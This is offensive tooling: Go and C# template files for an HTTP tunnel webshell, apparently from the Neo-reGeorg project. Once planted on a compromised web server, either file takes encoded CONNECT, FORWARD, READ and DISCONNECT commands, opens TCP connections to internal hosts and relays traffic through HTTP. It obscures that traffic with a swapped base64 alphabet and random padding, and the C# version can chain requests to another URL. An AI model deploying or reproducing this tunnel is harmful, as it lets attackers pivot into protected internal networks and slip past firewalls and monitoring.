File: templates/tunnel.go
package main

import (
    "fmt"
    "io/ioutil"
    "bytes"
    "encoding/base64"
    "encoding/binary"
    "net/http"
    "net"
    "math/rand"
    "os"
    "strings"
    "time"
    "sync"
)

var (
    CMD         = 1
    MARK        = 2
    STATUS      = 3
    ERROR       = 4
    IP          = 5
    PORT        = 6
    REDIRECTURL = 7
    DATA        = 8

    en     = []byte("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")
    de     = []byte("BASE64 CHARSLIST")
    en_map = make(map[byte]byte)
    de_map = make(map[byte]byte)

    neoreg_hello = []byte("NeoGeorg says, 'All seems fine'")

    sessions = make(map[string] net.Conn)

    lock sync.Mutex
)

func zip(tomap map[byte]byte, a []byte, b []byte) {
    size := len(a)
    for i := 0; i < size; i++ {
        tomap[a[i]] = b[i]
    }
}

func base64decode(data []byte) ([]byte, error) {
    size := len(data)
    out := make([]byte, size)
    for i := 0; i < size; i++ {
        n := de_map[data[i]]
        if n == 0 {
            out[i] = data[i]
        } else {
            out[i] = n
        }
    }
    return base64.StdEncoding.DecodeString(string(out))
}

func base64encode(rawdata []byte) []byte {
    data := []byte(base64.StdEncoding.EncodeToString(rawdata))
    size := len(data)
    out := make([]byte, size)
    for i := 0; i < size; i++ {
        n := en_map[data[i]]
        if n == 0 {
            out[i] = data[i]
        } else {
            out[i] = n
        }
    }
    return out
}

func blv_decode(data []byte) map[int][]byte {
    info := make(map[int][]byte)
    in := bytes.NewReader(data)
    var b_byte byte
    var l_int32 int32

    for true {
        err := binary.Read(in, binary.BigEndian, &b_byte)
        if err != nil {
            break
        }
        binary.Read(in, binary.BigEndian, &l_int32)
        b := int(b_byte)
        l := int(l_int32)

        v := make([]byte, l)
        in.Read(v)
        info[b] = v
    }
    return info
}

func randbyte() []byte {
    min := 5
    max := 20
    length := rand.Intn(max - min - 1) + 1
    data := make([]byte, length)
    rand.Read(data)
    return data
}

func blv_encode(info map[int][]byte) []byte {
    info[0] = randbyte()
    info[9] = randbyte()

    data := bytes.NewBuffer([]byte{})
    for b, v := range(info) {
        l := len(v)
        binary.Write(data, binary.BigEndian, byte(b))
        binary.Write(data, binary.BigEndian, int32(l))
        binary.Write(data, binary.BigEndian, v)
    }
    return data.Bytes()
}

func neoreg(w http.ResponseWriter, r *http.Request) {
    defer r.Body.Close()
    data, _ := ioutil.ReadAll(r.Body)

    out, err := base64decode(data)
    if err == nil && len(out) != 0 {
        info := blv_decode(out)
        rinfo := make(map[int][]byte)

        cmd  := string(info[CMD])
        mark := string(info[MARK])
        switch cmd {
            case "CONNECT":
                ip := string(info[IP])
                port_str := string(info[PORT])
                targetAddr := ip + ":" + port_str
                conn, err := net.DialTimeout("tcp", targetAddr, time.Millisecond*time.Duration(3000))
                if err == nil {
                    lock.Lock()
                    sessions[mark] = conn
                    lock.Unlock()
                    rinfo[STATUS] = []byte("OK")
                } else {
                    rinfo[STATUS] = []byte("FAIL")
                    rinfo[ERROR]  = []byte(err.Error())
                }

            case "FORWARD":
                conn := sessions[mark]
                if conn != nil {
                    data := info[DATA]
                    _, err := conn.Write(data)
                    if err == nil {
                        rinfo[STATUS] = []byte("OK")
                    } else {
                        rinfo[STATUS] = []byte("FAIL")
                        rinfo[ERROR] = []byte(err.Error())
                    }
                } else {
                    rinfo[STATUS] = []byte("FAIL")
                    rinfo[ERROR]  = []byte("session is closed")
                }

            case "READ":
                conn := sessions[mark]
                if conn != nil {
                    data := make([]byte, MAXREADSIZE)
                    n, err := conn.Read(data)
                    if err == nil {
                        rinfo[DATA]   = data[:n]
                        rinfo[STATUS] = []byte("OK")
                    } else {
                        rinfo[STATUS] = []byte("FAIL")
                        rinfo[ERROR] = []byte(err.Error())
                    }
                } else {
                    rinfo[STATUS] = []byte("FAIL")
                    rinfo[ERROR]  = []byte("session is closed")
                }

            case "DISCONNECT":
                conn := sessions[mark]
                lock.Lock()
                delete(sessions, mark)
                if conn != nil {
                    conn.Close()
                }
                lock.Unlock()
            default:
                hello, _ := base64decode(neoreg_hello)
                fmt.Fprintf(w, "%s", hello)
                return
        }

        data := blv_encode(rinfo)
        fmt.Fprintf(w, "%s", base64encode(data))
    } else {
        hello, _ := base64decode(neoreg_hello)
        fmt.Fprintf(w, "%s", hello)
    }


}

func main() {
    if len(os.Args) != 2 {
        return
    }
    zip(en_map, en, de)
    zip(de_map, de, en)

    listen_addr := os.Args[1]
    if ! strings.ContainsAny(listen_addr, ":") {
        listen_addr = ":" + listen_addr
    }
    http.HandleFunc("/", neoreg)
    http.ListenAndServe(listen_addr, nil)
}

File: templates/tunnel.cs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Net.Sockets;
using System.Web;

namespace Neoreg
{
    public class Neoreg
    {
        public Neoreg()
        {
            int DATA = 1;
            int CMD = 2;
            int MARK = 3;
            int STATUS = 4;
            int ERROR = 5;
            int IP = 6;
            int PORT = 7;
            int REDIRECTURL = 8;
            int FORCEREDIRECT = 9;

            String GeorgHello = "NeoGeorg says, 'All seems fine'";

            Object[] info = new Object[40];
            Object[] rinfo = new Object[40];

            String en = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
            String de = "BASE64 CHARSLIST";

            String requestDataHead = "";
            String requestDataTail = "";

            HttpRequest httpRequest = HttpContext.Current.Request;
            HttpResponse httpResponse = HttpContext.Current.Response;
            HttpApplicationState application = HttpContext.Current.Application;

            if (httpRequest.ContentLength != -1)
            {
                byte[] buff = new byte[httpRequest.ContentLength];
                httpRequest.InputStream.Read(buff, 0, buff.Length);
                String inputData = Encoding.Default.GetString(buff);
                if (USE_REQUEST_TEMPLATE == 1 && inputData.Length > 0)
                {
                    requestDataHead = inputData.Substring(0, START_INDEX);
                    requestDataTail = inputData.Substring(inputData.Length - END_INDEX, END_INDEX);

                    inputData = inputData.Substring(START_INDEX);
                    inputData = inputData.Substring(0, inputData.Length - END_INDEX);
                }

                string b64 = StrTr(inputData, de, en);
                try
                {
                    byte[] data = Convert.FromBase64String(b64);
                    info = blv_decode(data);
                }
                catch (Exception e)
                {
                    return;
                }
            }

            String rUrl = (String)info[REDIRECTURL];
            if (rUrl != null)
            {
                Uri u = new Uri(rUrl);
                WebRequest request = WebRequest.Create(u);
                request.Method = httpRequest.HttpMethod;
                foreach (string key in httpRequest.Headers)
                {
                    try
                    {
                        request.Headers.Add(key, httpRequest.Headers.Get(key));
                    }
                    catch (Exception e)
                    {
                    }
                }

                try
                {
                    Stream body = request.GetRequestStream();
                    info[REDIRECTURL] = null;
                    byte[] data = Encoding.Default.GetBytes(requestDataHead +
                                                            StrTr(Convert.ToBase64String(blv_encode(info)), en, de) +
                                                            requestDataTail);
                    body.Write(data, 0, data.Length);
                    body.Close();
                }
                catch (Exception e)
                {
                }

                HttpWebResponse response = (HttpWebResponse)request.GetResponse();
                WebHeaderCollection webHeader = response.Headers;
                for (int i = 0; i < webHeader.Count; i++)
                {
                    string rkey = webHeader.GetKey(i);
                    if (rkey != "Content-Length" && rkey != "Transfer-Encoding")
                        httpResponse.AddHeader(rkey, webHeader[i]);
                }

                StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding("UTF-8"));
                string rbody = repBody.ReadToEnd();
                httpResponse.AddHeader("Content-Length", rbody.Length.ToString());
                httpResponse.Write(rbody);
                return;
            }

            httpResponse.StatusCode = HTTPCODE;
            String cmd = (String)info[CMD];
            if (cmd != null)
            {
                String mark = (String)info[MARK];
                if (cmd == "CONNECT")
                {
                    try
                    {
                        String target = (String)info[IP];
                        int port = int.Parse((String)info[PORT]);
                        IPAddress ip;
                        try
                        {
                            ip = IPAddress.Parse(target);
                        }
                        catch (Exception ex)
                        {
                            IPHostEntry host = Dns.GetHostByName(target);
                            ip = host.AddressList[0];
                        }

                        System.Net.IPEndPoint remoteEP = new IPEndPoint(ip, port);
                        Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

                        // set the connect timeout to 2 seconds, default 20 seconds
                        IAsyncResult result = sender.BeginConnect(remoteEP, null, null);
                        bool success = result.AsyncWaitHandle.WaitOne(2000, true);

                        if (sender.Connected)
                        {
                            sender.Blocking = false;
                            application.Add(mark, sender);
                            rinfo[STATUS] = "OK";
                        }
                        else
                        {
                            sender.Close();
                            rinfo[STATUS] = "FAIL";
                            if (success)
                            {
                                rinfo[ERROR] = "Port close";
                            }
                            else
                            {
                                rinfo[ERROR] = "Port filtered";
                            }
                        }
                    }
                    catch (Exception ex)
                    {
                        rinfo[STATUS] = "FAIL";
                        rinfo[ERROR] = ex.Message;
                    }
                }
                else if (cmd == "DISCONNECT")
                {
                    try
                    {
                        Socket s = (Socket)application[mark];
                        s.Close();
                    }
                    catch (Exception ex)
                    {
                    }

                    application.Remove(mark);
                }
                else if (cmd == "FORWARD")
                {
                    Socket s = (Socket)application[mark];
                    try
                    {
                        s.Send((byte[])info[DATA]);
                        rinfo[STATUS] = "OK";
                    }
                    catch (Exception ex)
                    {
                        rinfo[STATUS] = "FAIL";
                        rinfo[ERROR] = ex.Message;
                    }
                }
                else if (cmd == "READ")
                {
                    try
                    {
                        Socket s = (Socket)application[mark];
                        int maxRead = MAXREADSIZE;
                        int readbuflen = READBUF;
                        int readLen = 0;
                        byte[] readBuff = new byte[readbuflen];
                        MemoryStream readData = new MemoryStream();
                        try
                        {
                            int c = s.Receive(readBuff);
                            while (c > 0)
                            {
                                byte[] newBuff = new byte[c];
                                System.Buffer.BlockCopy(readBuff, 0, newBuff, 0, c);
                                string b64 = Convert.ToBase64String(newBuff);
                                readData.Write(newBuff, 0, c);
                                readLen += c;
                                if (c < readbuflen || readLen >= maxRead)
                                    break;
                                c = s.Receive(readBuff);
                            }

                            rinfo[DATA] = readData.ToArray();
                            rinfo[STATUS] = "OK";
                        }
                        catch (SocketException ex)
                        {
                            rinfo[STATUS] = "OK";
                        }
                    }
                    catch (Exception ex)
                    {
                        rinfo[STATUS] = "FAIL";
                        rinfo[ERROR] = ex.Message;
                    }
                }

                httpResponse.Write(StrTr(Convert.ToBase64String(blv_encode(rinfo)), en, de));
            }
            else
            {
                httpResponse.Write(Encoding.Default.GetString(Convert.FromBase64String(StrTr(GeorgHello, de, en))));
            }
        }
        
        public String StrTr(string input, string frm, string to)
        {
            String r = "";
            for (int i = 0; i < input.Length; i++)
            {
                int index = frm.IndexOf(input[i]);
                if (index != -1)
                    r += to[index];
                else
                    r += input[i];
            }

            return r;
        }

        public static Object[] blv_decode(byte[] data)
        {
            Object[] info = new Object[40];

            int i = 0;
            int data_len = data.Length;
            int b;
            byte[] length = new byte[4];

            MemoryStream dataInput = new MemoryStream(data);

            while (i < data_len)
            {
                b = dataInput.ReadByte();
                dataInput.Read(length, 0, length.Length);
                int l = bytesToInt(length) - BLV_L_OFFSET;
                byte[] v = new byte[l];
                dataInput.Read(v, 0, v.Length);
                i += (5 + l);
                if (b > 1 && b <= BLVHEAD_LEN)
                {
                    info[b] = Encoding.Default.GetString(v);
                }
                else
                {
                    info[b] = v;
                }
            }

            return info;
        }

        public static byte[] blv_encode(Object[] info)
        {
            Random r = new Random();
            info[0] = randBytes(r, 5, 20);
            info[39] = randBytes(r, 5, 20);
            MemoryStream buf = new MemoryStream();
            for (int b = 0; b < info.Length; b++)
            {
                if (info[b] != null)
                {
                    Object o = info[b];
                    byte[] v;
                    if (o is String)
                    {
                        v = Encoding.Default.GetBytes((String)o);
                    }
                    else
                    {
                        v = (byte[])o;
                    }

                    buf.WriteByte((byte)b);
                    try
                    {
                        byte[] l = intToBytes(v.Length + BLV_L_OFFSET);
                        buf.Write(l, 0, l.Length);
                        buf.Write(v, 0, v.Length);
                    }
                    catch (Exception e)
                    {
                    }
                }
            }

            return buf.ToArray();
        }

        public static byte[] randBytes(Random r, int min, int max)
        {
            int len = r.Next(min, max);
            byte[] randbytes = new byte[len];
            r.NextBytes(randbytes);
            return randbytes;
        }

        public static int bytesToInt(byte[] bytes)
        {
            int i;
            i = (bytes[3] & 0xff)
                | ((bytes[2] & 0xff) << 8)
                | ((bytes[1] & 0xff) << 16)
                | ((bytes[0] & 0xff) << 24);
            return i;
        }

        public static byte[] intToBytes(int value)
        {
            byte[] src = new byte[4];
            src[3] = (byte)(value & 0xFF);
            src[2] = (byte)((value >> 8) & 0xFF);
            src[1] = (byte)((value >> 16) & 0xFF);
            src[0] = (byte)((value >> 24) & 0xFF);
            return src;
        }
    }
}